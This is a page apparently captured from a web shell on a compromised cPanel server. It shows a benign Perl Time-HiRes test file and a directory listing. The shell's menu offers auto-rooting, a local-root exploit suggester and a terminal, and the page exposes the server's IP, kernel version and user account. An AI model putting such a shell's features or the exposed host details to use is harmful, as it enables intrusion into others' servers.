Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
Time-HiRes /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
Watchdog.pm
1.63
KB
-r--r--r--
2014-12-27 11:48
alarm.t
5.83
KB
-r--r--r--
2014-12-27 11:48
clock.t
2.65
KB
-r--r--r--
2014-12-27 11:48
gettimeofday.t
757
B
-r--r--r--
2014-12-27 11:48
itimer.t
1.69
KB
-r--r--r--
2014-12-27 11:48
nanosleep.t
838
B
-r--r--r--
2014-12-27 11:48
sleep.t
811
B
-r--r--r--
2014-12-27 11:48
stat.t
2.42
KB
-r--r--r--
2014-12-27 11:48
time.t
551
B
-r--r--r--
2014-12-27 11:48
tv_interval.t
186
B
-r--r--r--
2014-12-27 11:48
ualarm.t
2.65
KB
-r--r--r--
2014-12-27 11:48
usleep.t
1.92
KB
-r--r--r--
2014-12-27 11:48
Save
Rename
use strict; use Test::More 0.82 tests => 2; use t::Watchdog; BEGIN { require_ok "Time::HiRes"; } SKIP: { skip "no gettimeofday", 1 unless &Time::HiRes::d_gettimeofday; my ($s, $n, $i) = (0); for $i (1 .. 100) { $s += Time::HiRes::time() - CORE::time(); $n++; } # $s should be, at worst, equal to $n # (CORE::time() may be rounding down, up, or closest), # but allow 10% of slop. ok abs($s) / $n <= 1.10 or note "Time::HiRes::time() not close to CORE::time()"; note "s = $s, n = $n, s/n = ", abs($s)/$n; } 1;